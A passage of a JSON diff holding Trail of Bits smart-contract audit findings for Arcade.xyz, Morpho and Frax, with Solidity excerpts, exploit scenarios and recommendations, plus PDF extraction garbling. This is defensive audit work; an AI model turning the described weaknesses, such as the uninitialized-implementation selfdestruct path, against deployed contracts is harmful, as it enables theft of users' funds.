a loan is opened, as well as the various possible outcomes, including the expected net prots if the loan is repaid, rolled over, defaulted, or redeemed. Long term, add interactive ways for users to calculate their expected prots, such as a loan simulator. 53 Arcade.xyz V3 Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "1. Di\u0000erent zero-address errors thrown by single and batch NFT withdrawal functions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-arcade-securityreview.pdf", + "body": "The withdrawBatch function throws an error that is dierent from the single NFT withdrawal functions (withdrawERC721, withdrawERC1155). This could confuse users and other applications that interact with the Arcade contracts. The withdrawBatch function throws a custom error (AV_ZeroAddress) if the to parameter is set to the zero address. The single NFT withdrawal functions withdrawERC721 and withdrawERC1155 do not explicitly check the to parameter. All three of these functions internally call the _withdrawERC721 and _withdrawERC1155 functions, which also do not explicitly check the to parameter. The lack of such a check is not a problem: according to the ERC-721 and ERC-1155 standards, a transfer must revert if to is the zero address, so the single NFT withdrawal functions will revert on this condition. However, they will revert with the error message that is dened inside the actual NFT contract instead of the Arcade AV_ZeroAddress error, which is thrown when withdrawBatch reverts. ) external override onlyOwner onlyWithdrawEnabled { uint256 tokensLength = tokens.length; if (tokensLength > MAX_WITHDRAW_ITEMS) revert address[] calldata tokens, uint256[] calldata tokenIds, TokenType[] calldata tokenTypes, address to function withdrawBatch( 193 194 195 196 197 198 199 200 AV_TooManyItems(tokensLength); 201 202 AV_LengthMismatch(\"tokenType\"); 203 204 205 206 if (to == address(0)) revert AV_ZeroAddress(); for (uint256 i = 0; i < tokensLength; i++) { if (tokens[i] == address(0)) revert AV_ZeroAddress(); if (tokensLength != tokenIds.length) revert AV_LengthMismatch(\"tokenId\"); if (tokensLength != tokenTypes.length) revert 22 Arcade.xyz V3 Security Assessment Figure 1.1: A snippet of the withdrawBatch function in arcade-protocol/contracts/vault/AssetVault.sol Additionally, the CryptoPunks NFT contract does not follow the ERC-721 and ERC-1155 standards and contains no check that prevents funds from being transferred to the zero address (and the function is called transferPunk instead of the standard transfer). An explicit check to ensure that to is not the zero address inside the withdrawPunk function is therefore recommended. 114 115 116 117 118 119 120 121 122 123 124 125 126 it. 127 128 129 130 131 132 133 134 function transferPunk(address to, uint punkIndex) { if (!allPunksAssigned) throw; if (punkIndexToAddress[punkIndex] != msg.sender) throw; if (punkIndex >= 10000) throw; if (punksOfferedForSale[punkIndex].isForSale) { punkNoLongerForSale(punkIndex); } punkIndexToAddress[punkIndex] = to; balanceOf[msg.sender]--; balanceOf[to]++; Transfer(msg.sender, to, 1); PunkTransfer(msg.sender, to, punkIndex); // Check for the case where there is a bid from the new owner and refund // Any other bid can stay in place. Bid bid = punkBids[punkIndex]; if (bid.bidder == to) { // Kill bid and refund value pendingWithdrawals[to] += bid.value; punkBids[punkIndex] = Bid(false, punkIndex, 0x0, 0); } } Figure 1.2: The transferPunk function in CryptoPunksMarket contract (Etherscan) Lastly, there is no string argument to the AV_ZeroAddress error to indicate which variable equaled the zero address and caused the revert, unlike the AV_LengthMismatch error. For example, in the batch function (gure 1.1), the AV_ZeroAddress could be thrown in line 203 or 206. Exploit Scenario Bob, a developer of a front-end blockchain application that interacts with the Arcade contracts, develops a page that interacts with an AssetVault contract. In his implementation, he catches specic errors that are thrown so that he can show an informative message to the user. Because the batch and withdrawal functions throw dierent errors when to is the zero address, he needs to write two versions of error handlers instead of just one. 23 Arcade.xyz V3 Security Assessment Recommendations Short term, add the zero address check with the custom error to the _withdrawERC721 and _withdrawERC1155 functions. This will cause the same custom error to be thrown for all of the single and batch NFT withdrawal functions. Also, add an explicit zero-address check inside the withdrawPunk function. Lastly, add a string argument to the AV_ZeroAddress custom error that is used to indicate the name of the variable that triggered the error (similar to the one in AV_LengthMismatch). Long term, ensure consistency in the errors thrown throughout the implementation. This will allow users and developers to understand errors that are thrown and will allow the Arcade team to test fewer errors. 24 Arcade.xyz V3 Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "11. Asset vault nesting can lead to loss of assets ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-arcade-securityreview.pdf", + "body": "Allowing asset vaults to be nested (e.g., vault A is owned by vault B, and vault B is owned by vault X, etc.) could result in a situation in which multiple asset vaults own each other. This would result in a deadlock preventing assets in the aected asset vaults from ever being withdrawn again. Asset vaults are designed to hold dierent types of assets, including ERC-721 tokens. The ownership of an asset vault is tracked by an accompanying ERC-721 token that is minted (gure 11.1) when the asset vault is deployed through the VaultFactory contract. 164 (uint256) { 165 166 167 mintFee); 168 169 170 171 172 173 mintFee); 174 175 176 177 } function initializeBundle(address to) external payable override returns uint256 mintFee = feeController.get(FL_01); if (msg.value < mintFee) revert VF_InsufficientMintFee(msg.value, address vault = _create(); _mint(to, uint256(uint160(vault))); emit VaultCreated(vault, to); return uint256(uint160(vault)); if (msg.value > mintFee) payable(msg.sender).transfer(msg.value - Figure 11.1: The initializeBundle function in arcade-protocol/contracts/vault/VaultFactory.sol To add an ERC-721 asset to an asset vault, it needs to be transferred to the asset vaults address. Because the ownership of an asset vault is tracked by an ERC-721 token, it is possible to transfer the ownership of an asset vault to another asset vault by simply transferring the ERC-721 token representing vault ownership. To withdraw ERC-721 tokens from an asset vault, the owner (the holder of the asset vaults ERC-721 token) needs to 43 Arcade.xyz V3 Security Assessment enable withdrawals (using the enableWithdraw function) and then call the withdrawERC721 (or withdrawBatch) function. 121 122 123 124 150 151 152 153 154 155 156 function enableWithdraw() external override onlyOwner onlyWithdrawDisabled { withdrawEnabled = true; emit WithdrawEnabled(msg.sender); } Figure 11.2: The enableWithdraw function in arcade-protocol/contracts/vault/AssetVault.sol function withdrawERC721( address token, uint256 tokenId, address to ) external override onlyOwner onlyWithdrawEnabled { _withdrawERC721(token, tokenId, to); } Figure 11.3: The withdrawERC721 function in arcade-protocol/contracts/vault/AssetVault.sol Only the owner of an asset vault can enable and perform withdrawals. Therefore, if two (or more) vaults own each other, it would be impossible for a user to enable or perform withdrawals on the aected vaults, permanently locking all assets (ERC-721, ERC-1155, ERC-20, ETH) within them. The severity of the issue depends on the UI, which was out of scope for this review. If the UI does not prevent vaults from owning each other, the severity of this issue is higher. In terms of likelihood, this issue would require a user to make a mistake (although a mistake that is far more likely than the transfer of tokens to a random address) and would require the UI to fail to detect and prevent or warn the user from making such a mistake. We therefore rated the diculty of this issue as high. Exploit Scenario Alice decides to borrow USDC by putting up some of her NFTs as collateral:", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "16. Malicious borrowers can use forceRepay to grief lenders ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-arcade-securityreview.pdf", + "body": "A malicious borrower can grief a lender by calling the forceRepay function instead of the repay function; doing so would allow the borrower to pay less in gas fees and require the lender to perform a separate transaction to retrieve their funds (using the redeemNote function) and to pay a redeem fee. At any time after the loan is set and before the lender claims the collateral if the loan is past its due date, the borrower has to pay their full debt back in order to recover their assets. For doing so, there are two functions in RepaymentController: repay and forceRepay. The dierence between them is that the latter transfers the tokens to the LoanCore contract instead of directly to the lender. It is meant to allow the borrower to pay their obligations when the lender cannot receive tokens for any reason. For the lender to get their tokens back in this scenario, they must call the redeemNote function in RepaymentController, which in turn calls LoanCore.redeemNote, which transfers the tokens to an address set by the lender in the call. Because the borrower is free to decide which function to call to repay their debt, they can arbitrarily decide to do so via forceRepay, obligating the lender to send a transaction (with its associated gas fees) to recover their tokens. Additionally, depending on the conguration of the protocol, it is possible that the lender has to pay an additional fee (LENDER_REDEEM_FEE) to get back their own tokens, cutting their prots with no chance to opt out. 126 127 128 129 130 RC_InvalidState(data.state); 131 132 133 134 BASIS_POINTS_DENOMINATOR; function redeemNote(uint256 loanId, address to) external override { LoanLibrary.LoanData memory data = loanCore.getLoan(loanId); (, uint256 amountOwed) = loanCore.getNoteReceipt(loanId); if (data.state != LoanLibrary.LoanState.Repaid) revert address lender = lenderNote.ownerOf(loanId); if (lender != msg.sender) revert RC_OnlyLender(lender, msg.sender); uint256 redeemFee = (amountOwed * feeController.get(FL_09)) / 54 Arcade.xyz V3 Security Assessment 135 136 137 } loanCore.redeemNote(loanId, redeemFee, to); Figure 16.1: The redeemNote function in arcade-protocol/contracts/RepaymentController.sol Note that, from the perspective of the borrower, it is actually cheaper to call forceRepay than repay because of the gas saved by not transferring the tokens to the lender and not burning one of the promissory notes. Exploit Scenario Bob has to pay back his loan, and he decides to do so via forceRepay to save gas in the transaction. Lucy, the lender, wants her tokens back. She is now forced to call redeemNote to get them. In this transaction, she lost the gas fees that the borrower would have paid to send the tokens directly to her, and she has to pay an additional fee (LENDER_REDEEMER_FEE), causing her to receive less value from the loan than she originally expected. Recommendations Short term, remove the incentive (the lower gas cost) for the borrower to call forceRepay instead of repay. Consider taking one of the following actions: Force the lender to always pull their funds using the redeemNote function. This can be achieved by removing the repay function and requiring the borrower to call forceRepay. Remove the forceRepay function and modify the repay function so that it transfers the funds to the lender in a try/catch statement and creates a redeem note (which the lender can exchange for their funds using the redeemNote function) only if that transfer fails. Long term, when designing a smart contract protocol, always consider the incentives for each party to perform actions in the protocol, and avoid making an actor pay for the mistakes or maliciousness of others. By thoroughly documenting the incentives structure, aws can be spotted and mitigated before the protocol goes live. 55 Arcade.xyz V3 Security Assessment A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and diculty levels used in this document. Vulnerability Categories Category", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Low" + ] + }, + { + "title": "1. Lack of two-step process for contract ownership changes ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/MorphoLabs.pdf", + "body": "The owner of the IncentivesVault contract and other Ownable Morpho contracts can be changed by calling the transferOwnership function. This function internally calls the _transferOwnership function, which immediately sets the contracts new owner. Making such a critical change in a single step is error-prone and can lead to irrevocable mistakes. 13 contract IncentivesVault is IIncentivesVault, Ownable { Figure 1.1: Inheritance of contracts/compound/IncentivesVault.sol 62 function transferOwnership(address newOwner) public virtual onlyOwner { 63 64 65 } require(newOwner != address(0), \"Ownable: new owner is the zero address\"); _transferOwnership(newOwner); Figure 1.2: The transferOwnership function in @openzeppelin/contracts/access/Ownable.sol Exploit Scenario Bob, the IncentivesVault owner, invokes transferOwnership() to change the contracts owner but accidentally enters the wrong address. As a result, he permanently loses access to the contract. Recommendations Short term, for contract ownership transfers, implement a two-step process, in which the owner proposes a new address and the transfer is completed once the new address has executed a call to accept the role. Long term, identify and document all possible actions that can be taken by privileged accounts and their associated risks. This will facilitate reviews of the codebase and prevent future mistakes.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "2. Incomplete information provided in Withdrawn and Repaid events ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/MorphoLabs.pdf", + "body": "The core operations in the PositionsManager contract emit events with parameters that provide information about the operations actions. However, two events, Withdrawn and Repaid, do not provide complete information. For example, the withdrawLogic function, which performs withdrawals, takes a _supplier address (the user supplying the tokens) and _receiver address (the user receiving the tokens): /// @param _supplier The address of the supplier. /// @param _receiver The address of the user who will receive the tokens. /// @param _maxGasForMatching The maximum amount of gas to consume within a matching engine loop. function withdrawLogic( address _poolTokenAddress, uint256 _amount, address _supplier, address _receiver, uint256 _maxGasForMatching ) external Figure 2.1: The function signature of PositionsManagers withdrawLogic function However, the corresponding event in _safeWithdrawLogic records only the msg.sender of the transaction, so the _supplier and _receiver involved in the transaction are unclear. Moreover, if a withdrawal is performed as part of a liquidation operation, three separate addresses may be involvedthe _supplier, the _receiver, and the _user who triggered the liquidationand those monitoring events will have to cross-reference multiple events to understand whose tokens moved where. /// @notice Emitted when a withdrawal happens. /// @param _user The address of the withdrawer. /// @param _poolTokenAddress The address of the market from where assets are withdrawn. /// @param _amount The amount of assets withdrawn (in underlying). /// @param _balanceOnPool The supply balance on pool after update. /// @param _balanceInP2P The supply balance in peer-to-peer after update. event Withdrawn( address indexed _user, Figure 2.2: The declaration of the Withdrawn event in PositionsManager emit Withdrawn( msg.sender, _poolTokenAddress, _amount, supplyBalanceInOf[_poolTokenAddress][msg.sender].onPool, supplyBalanceInOf[_poolTokenAddress][msg.sender].inP2P ); Figure 2.3: The emission of the Withdrawn event in the _safeWithdrawLogic function A similar issue is present in the _safeRepayLogic functions Repaid event. Recommendations Short term, add the relevant addresses to the Withdrawn and Repaid events. Long term, review all of the events emitted by the system to ensure that they emit sucient information.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "3. Missing access control check in withdrawLogic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/MorphoLabs.pdf", + "body": "The PositionsManager contracts withdrawLogic function does not perform any access control checks. In practice, this issue is not exploitable, as all interactions with this contract will be through delegatecalls with a hard-coded msg.sender sent from the main Morpho contract. However, if this code is ever reused or if the architecture of the system is ever modied, this guarantee may no longer hold, and users without the proper access may be able to withdraw funds. /// @dev Implements withdraw logic with security checks. /// @param _poolTokenAddress The address of the market the user wants to interact with. /// @param _amount The amount of token (in underlying). /// @param _supplier The address of the supplier. /// @param _receiver The address of the user who will receive the tokens. /// @param _maxGasForMatching The maximum amount of gas to consume within a matching engine loop. function withdrawLogic( address _poolTokenAddress, uint256 _amount, address _supplier, address _receiver, uint256 _maxGasForMatching ) external { Figure 3.1: The withdrawLogic function, which takes a supplier and whose comments note that it performs security checks Recommendations Short term, add a check to the withdrawLogic function to ensure that it withdraws funds only from the msg.sender. Long term, implement security checks consistently throughout the codebase.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "4. Lack of zero address checks in setter functions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/MorphoLabs.pdf", + "body": "Certain setter functions fail to validate incoming arguments, so callers can accidentally set important state variables to the zero address. A mistake like this could initially go unnoticed because a delegatecall to an address without code will return success. /// @notice Sets the `positionsManager`. /// @param _positionsManager The new `positionsManager`. function setPositionsManager(IPositionsManager _positionsManager) external onlyOwner { positionsManager = _positionsManager; emit PositionsManagerSet(address(_positionsManager)); } Figure 4.1: An important address setter in MorphoGovernance Exploit Scenario Alice and Bob control a multisignature wallet that is the owner of a deployed Morpho contract. They decide to set _positionsManager to a newly upgraded contract but, while invoking setPositionsManager, they mistakenly omit the address. As a result, _positionsManager is set to the zero address, resulting in undened behavior. Recommendations Short term, add zero-value checks to all important address setters to ensure that owners cannot accidentally set addresses to incorrect values, misconguring the system. Specically, add zero-value checks to the setPositionsManager, setRewardsManager, setInterestRates, setTreasuryVault, and setIncentivesVault functions, as well as the _cETH and _cWeth parameters of the initialize function in the MorphoGovernance contract. Long term, incorporate Slither into a continuous integration pipeline, which will continuously warn developers when functions do not have checks for zero values.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "5. Risky use of toggle functions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/MorphoLabs.pdf", + "body": "The codebase uses a toggle function, togglePauseStatus, to pause and unpause a market. This function is error-prone because setting a pause status on a market depends on the markets current state. Multiple uncoordinated pauses could result in a failure to pause a market in the event of an incident. /// @notice Toggles the pause status on a specific market in case of emergency. /// @param _poolTokenAddress The address of the market to pause/unpause. function togglePauseStatus(address _poolTokenAddress) external onlyOwner isMarketCreated(_poolTokenAddress) { } Types.MarketStatus storage marketStatus_ = marketStatus[_poolTokenAddress]; bool newPauseStatus = !marketStatus_.isPaused; marketStatus_.isPaused = newPauseStatus; emit PauseStatusChanged(_poolTokenAddress, newPauseStatus); Figure 5.1: The togglePauseStatus method in MorphoGovernance This issue also applies to togglePartialPauseStatus, toggleP2P, and toggleCompRewardsActivation in MorphoGovernance and to togglePauseStatus in IncentivesVault. Exploit Scenario All signers of a 4-of-9 multisignature wallet that owns a Morpho contract notice an ongoing attack that is draining user funds from the protocol. Two groups of four signers hurry to independently call togglePauseStatus, resulting in a failure to pause the system and leading to the further loss of funds. Recommendations Short term, replace the toggle functions with ones that explicitly set the pause status to true or false. Long term, carefully review the incident response plan and ensure that it leaves as little room for mistakes as possible.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Medium" + ] + }, + { + "title": "6. Anyone can destroy Morphos implementation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/MorphoLabs.pdf", + "body": "An incorrect access control on the initialize function for Morphos implementation contract allows anyone to destroy the contract. Morpho uses the delegatecall proxy pattern for upgradeability: abstract contract MorphoStorage is OwnableUpgradeable, ReentrancyGuardUpgradeable { Figure 6.1: contracts/compound/MorphoStorage.sol#L16 With this pattern, a proxy contract is deployed and executes a delegatecall to the implementation contract for certain operations. Users are expected to interact with the system through this proxy. However, anyone can also directly call Morphos implementation contract. Despite the use of the proxy pattern, the implementation contract itself also has delegatecall capacities. For example, when called in the updateP2PIndexes function, setReserveFactor executes a delegatecall on user-provided addresses: function setReserveFactor(address _poolTokenAddress, uint16 _newReserveFactor) external onlyOwner isMarketCreated(_poolTokenAddress) { if (_newReserveFactor > MAX_BASIS_POINTS) revert ExceedsMaxBasisPoints(); updateP2PIndexes(_poolTokenAddress); Figure 6.2: contracts/compound/MorphoGovernance.sol#L203-L209 function updateP2PIndexes(address _poolTokenAddress) public { address(interestRatesManager).functionDelegateCall( abi.encodeWithSelector( interestRatesManager.updateP2PIndexes.selector, _poolTokenAddress ) ); } Figure 6.3: contracts/compound/MorphoUtils.sol#L119-L126 These functions are protected by the onlyOwner modier; however, the systems owner is set by the initialize function, which is callable by anyone: function initialize( IPositionsManager _positionsManager, IInterestRatesManager _interestRatesManager, IComptroller _comptroller, Types.MaxGasForMatching memory _defaultMaxGasForMatching, uint256 _dustThreshold, uint256 _maxSortedUsers, address _cEth, address _wEth ) external initializer { __ReentrancyGuard_init(); __Ownable_init(); Figure 6.4: contracts/compound/MorphoGovernance.sol#L114-L125 As a result, anyone can call Morpho.initialize to become the owner of the implementation and execute any delegatecall from the implementation, including to a contract containing a selfdestruct. Doing so will cause the proxy to point to a contract that has been destroyed. This issue is also present in PositionsManagerForAave. Exploit Scenario The system is deployed. Eve calls Morpho.initialize on the implementation and then calls setReserveFactor, triggering a delegatecall to an attacker-controlled contract that self-destructs. As a result, the system stops working. Recommendations Short term, add a constructor in MorphoStorage and PositionsManagerForAaveStorage that will set an is_implementation variable to true and check that this variable is false before executing any critical operation (such as initialize, delegatecall, and selfdestruct). By setting this variable in the constructor, it will be set only in the implementation and not in the proxy. Long term, carefully review the pitfalls of using the delegatecall proxy pattern. References Breaking Aave Upgradeability", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Low" + ] + }, + { + "title": "7. Lack of return value checks during token transfers ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/MorphoLabs.pdf", + "body": "In certain parts of the codebase, contracts that execute transfers of the Morpho token do not check the values returned from those transfers. The development of the Morpho token was not yet complete at the time of the audit, so we were unable to review the code specic to the Morpho token. Some tokens that are not ERC20 compliant return false instead of reverting, so failure to check such return values could result in undened behavior, including the loss of funds. If the Morpho token adheres to ERC20 standards, then this issue may not pose a risk; however, due to the lack of return value checks, the possibility of undened behavior cannot be eliminated. function transferMorphoTokensToDao(uint256 _amount) external onlyOwner { morphoToken.transfer(morphoDao, _amount); emit MorphoTokensTransferred(_amount); } Figure 7.1: The transerMorphoTokensToDao method in IncentivesVault Exploit Scenario The Morpho token code is completed and deployed alongside the other Morpho system components. It is implemented in such a way that it returns false instead of reverting when transfers fail, leading to undened behavior. Recommendations Short term, consider using a safeTransfer library for all token transfers. Long term, review the token integration checklist and check all the components of the system to ensure that they interact with tokens safely.", + "labels": [ + "Trail of Bits", + "Severity: Undetermined", + "Difficulty: Undetermined" + ] + }, + { + "title": "8. Risk of loss of precision in division operations ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/MorphoLabs.pdf", + "body": "A common pattern in the codebase is to divide a users debt by the total supply of a token; a loss of precision in these division operations could occur, which means that the supply delta would not account for the entire matched delta amount. The impact of this potential loss of precision requires further investigation. For example, the borrowLogic method uses this pattern: toWithdraw += matchedDelta; remainingToBorrow -= matchedDelta; delta.p2pSupplyDelta -= matchedDelta.div(poolSupplyIndex); emit P2PSupplyDeltaUpdated(_poolTokenAddress, delta.p2pSupplyDelta); Figure 8.1: Part of the borrowLogic() method Here, if matchedDelta is not a multiple of poolSupplyIndex, the remainder would not be taken into account. In an extreme case, if matchedDelta is smaller than poolSupplyIndex, the result of the division operation would be zero. An attacker could exploit this loss of precision to extract small amounts of underlying tokens sitting in the Morpho contract. Exploit Scenario Bob transfers some Dai to the Morpho contract by mistake. Eve sees this transfer, deposits some collateral, and then borrows an amount of Dai from Morpho small enough that it does not aect Eve's debt. Eve withdraws her deposited collateral and walks out with Bobs Dai. Further investigation into this exploit scenario is required. Recommendations Short term, add checks to validate input data to prevent precision issues in division operations. Long term, review all the arithmetic that is vulnerable to rounding issues.", + "labels": [ + "Trail of Bits", + "Severity: Undetermined", + "Difficulty: Undetermined" + ] + }, + { + "title": "1. Testing is not routine ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "The Frax Solidity repository does not have reproducible tests that can be run locally. Having reproducible tests is one of the best ways to ensure a codebases functional correctness. This nding is based on the following events: We tried to carry out the instructions in the Frax Solidity README at commit 31dd816 . We were unsuccessful. We reached out to Frax Finance for assistance. Frax Finance in turn pushed eight additional commits to the Frax Solidity repository (not counting merge commits). With these changes, we were able to run some of the tests, but not all of them. These events suggest that tests require substantial eort to run (as evidenced by the eight additional commits), and that they were not functional at the start of the assessment. Exploit Scenario Eve exploits a aw in a Frax Solidity contract. The aw would likely have been revealed through unit tests. Recommendations Short term, develop reproducible tests that can be run locally for all contracts. A comprehensive set of unit tests will help expose errors, protect against regressions, and provide a sort of documentation to users. Long term, incorporate unit testing into the CI process: Run the tests specic to contract X when a push or pull request aects contract X. Run all tests before deploying any new code, including updates to existing contracts. Automating the testing process will help ensure the tests are run regularly and consistently.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Undetermined" + ] + }, + { + "title": "2. No clear mapping from contracts to tests ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "There are 405 Solidity les within the contracts folder 1 , but there are only 80 les within the test folder 2 . Thus, it is not clear which tests correspond to which contracts. The number of contracts makes it impractical for a developer to run all tests when working on any one contract. Thus, to test a contract eectively, a developer will need to know which tests are specic to that contract. Furthermore, as per TOB-FRSOL-001 , we recommend that the tests specic to contract X be run when a push or pull request aects contract X. To apply this recommendation, a mapping from the contracts to their relevant tests is needed. Exploit Scenario Alice, a Frax Finance developer, makes a change to a Frax Solidity contract. Alice is unable to determine the le that should be used to test the contract and deploys the contract untested. The contract is exploited using a bug that would have been revealed by a test. Recommendations Short term, for each contract, produce a list of tests that exercise that contract. If any such list is empty, produce tests for that contract. Having such lists will help facilitate contract testing following a change to it. Long term, as per TOB-FRSOL-001 , incorporate unit testing into the CI process by running the tests specic to contract X when a push or pull request aects contract X. Automating the testing process will help ensure the tests are run regularly and consistently. 1 find contracts -name '*.sol' | wc -l 2 find test -type f | wc -l", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Undetermined" + ] + }, + { + "title": "3. amoMinterBorrow cannot be paused ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "The amoMinterBorrow function does not check for any of the paused ags or whether the minters associated collateral type is enabled. This reduces the FraxPoolV3 custodians ability to limit the scope of an attack. The relevant code appears in gure 3.1. The custodian can set recollateralizePaused[minter_col_idx] to true if there is a problem with recollateralization, and collateralEnabled[minter_col_idx] to false if there is a problem with the specic collateral type. However, amoMinterBorrow checks for neither of these. // Bypasses the gassy mint->redeem cycle for AMOs to borrow collateral function amoMinterBorrow ( uint256 collateral_amount ) external onlyAMOMinters { // Checks the col_idx of the minter as an additional safety check uint256 minter_col_idx = IFraxAMOMinter ( msg.sender ). col_idx (); // Transfer TransferHelper. safeTransfer (collateral_addresses[minter_col_idx], msg.sender , collateral_amount); } Figure 3.1: contracts/Frax/Pools/FraxPoolV3.sol#L552-L559 Exploit Scenario Eve discovers and exploits a bug in an AMO contract. The FraxPoolV3 custodian discovers the attack but is unable to stop it. The FraxPoolV3 owner is required to disable the AMO contracts. This occurs after signicant funds have been lost. Recommendations Short term, require recollateralizePaused[minter_col_idx] to be false and collateralEnabled[minter_col_idx] to be true for a call to amoMinterBorrow to succeed. This will help the FraxPoolV3 custodian to limit the scope of an attack. Long term, regularly review all uses of contract modiers, such as collateralEnabled . Doing so will help to expose bugs like the one described here.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: High" + ] + }, + { + "title": "4. Array updates are not constant time ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "In several places, arrays are allowed to grow without bound, and those arrays are searched linearly. If an array grows too large and the block gas limit is too low, such a search would fail. An example appears in gure 4.1. Minters are pushed to but never popped from minters_array . When a minter is removed from the array, its entry is searched for and then set to 0 . Note that the cost of such a search is proportional to the searched-for entrys index within the array. Thus, there will eventually be entries that cannot be removed under the current block gas limits because their positions within the array are too large. function removeMinter ( address minter_address ) external onlyByOwnGov { require (minter_address != address ( 0 ), \"Zero address detected\" ); require (minters[minter_address] == true , \"Address nonexistant\" ); // Delete from the mapping delete minters[minter_address]; // 'Delete' from the array by setting the address to 0x0 for ( uint i = 0 ; i < minters_array.length; i++){ if (minters_array[i] == minter_address) { minters_array[i] = address ( 0 ); // This will leave a null in the array and keep the indices the same break ; } } emit MinterRemoved (minter_address); } Figure 4.1: contracts/ERC20/__CROSSCHAIN/CrossChainCanonical.sol#L269-L285 Note that occasionally popping values from minters_array is not sucient to address the issue. An array can be popped from occasionally, yet its size can still be unbounded. A similar problem exists in CrossChainCanonical.sol with respect to bridge_tokens_array . This problem appears to exist in many parts of the codebase. Exploit Scenario Eve tricks Frax Finance into adding her minter to the CrosschainCanonical contract. Frax Finance later decides to remove her minter, but is unable to do so because minters_array has grown too large and block gas limits are too low. Recommendations Short term, enforce the following policy throughout the codebase: an arrays size is bounded, or the array is linearly searched, but never both. Arrays that grow without bound can be updated by moving computations, such as the computation of the index that needs to be updated, o-chain. Alternatively, the code that uses the array could be adjusted to eliminate the need for the array or to instead use a linked list. Adopting these changes will help ensure that the success of critical operations is not dependent on block gas limits. Long term, incorporate a check for this problematic code pattern into the CI pipeline. In the medium term, such a check might simply involve regular expressions. In the longer term, use Semgrep for Solidity if or when such support becomes stable. This will help to ensure the problem is not reintroduced into the codebase.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Medium" + ] + }, + { + "title": "5. Incorrect calculation of collateral amount in redeemFrax ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "The redeemFrax function of the FraxPoolV3 contract multiplies a FRAX amount with the collateral price to calculate the equivalent collateral amount (see the highlights in gure 5.1). This is incorrect. The FRAX amount should be divided by the collateral price instead. Fortunately, in the current deployment of FraxPoolV3 , only stablecoins are used as collateral, and their price is set to 1 (also see issue TOB-FRSOL-009 ). This mitigates the issue, as multiplication and division by one are equivalent. If the collateral price were changed to a value dierent from 1 , the exploit scenario described below would become possible, enabling users to steal all collateral from the protocol. if (global_collateral_ratio >= PRICE_PRECISION) { // 1-to-1 or overcollateralized collat_out = frax_after_fee .mul(collateral_prices[col_idx]) .div( 10 ** ( 6 + missing_decimals[col_idx])); // PRICE_PRECISION + missing decimals fxs_out = 0 ; } else if (global_collateral_ratio == 0 ) { // Algorithmic fxs_out = frax_after_fee .mul(PRICE_PRECISION) .div(getFXSPrice()); collat_out = 0 ; } else { // Fractional collat_out = frax_after_fee .mul(global_collateral_ratio) .mul(collateral_prices[col_idx]) .div( 10 ** ( 12 + missing_decimals[col_idx])); // PRICE_PRECISION ^2 + missing decimals fxs_out = frax_after_fee .mul(PRICE_PRECISION.sub(global_collateral_ratio)) .div(getFXSPrice()); // PRICE_PRECISIONS CANCEL OUT } Figure 5.1: Part of the redeemFrax function ( FraxPoolV3.sol#412433 ) When considering the of an entity , it is common to think of it as the amount of another entity or s per . that has a value equivalent to 1 . The unit of measurement of is , For example, the price of one apple is the number of units of another entity that can be exchanged for one unit of apple. That other entity is usually the local currency. For the US, the price of an apple is the number of US dollars that can be exchanged for an apple: = $ . 1. Given a and an amount of , one can compute the equivalent through multiplication: = . 2. Given a and an amount of , one can compute the equivalent through division: = / . In short, multiply if the known amount and price refer to the same entity; otherwise, divide. The getFraxInCollateral function correctly follows rule 2 by dividing a FRAX amount by the collateral price to get the equivalent collateral amount (gure 5.2). function getFRAXInCollateral ( uint256 col_idx , uint256 frax_amount ) public view returns ( uint256 ) { return frax_amount.mul(PRICE_PRECISION).div( 10 ** missing_decimals[col_idx]). div(collateral_prices[col_idx]) ; } Figure 5.2: The getFraxInCollateral function ( FraxPoolV3.sol#242244 ) Exploit Scenario A collateral price takes on a value other than 1 . This can happen through either a call to setCollateralPrice or future modications that fetch the price from an oracle (also see issue TOB-FRSOL-009 ). A collateral asset is worth $1,000. Alice mints 1,000 FRAX for 1 unit of collateral. Alice then redeems 1,000 FRAX for 1 million units of collateral ( ). As a result, Alice has stolen around $1 billion from the protocol. If the calculation were 1000 / 1000 correct, Alice would have redeemed her 1,000 FRAX for 1 unit of collateral ( 1000 1000 ). Recommendations Short term, in FraxPoolV3.redeemFrax , use the existing getFraxInCollateral helper function (gure 5.2) to compute the collateral amount that is equivalent to a given FRAX amount. Long term, verify that all calculations involving prices use the above rules 1 and 2 correctly.", + "labels": [ + "Trail of Bits", + "Severity: 